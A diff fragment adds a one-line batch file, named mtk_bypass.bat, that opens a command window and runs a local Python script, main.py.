mtk_bypass.bat ADDED
@@ -0,0 +1 @@
 
 
1
+ start cmd /k "python main.py"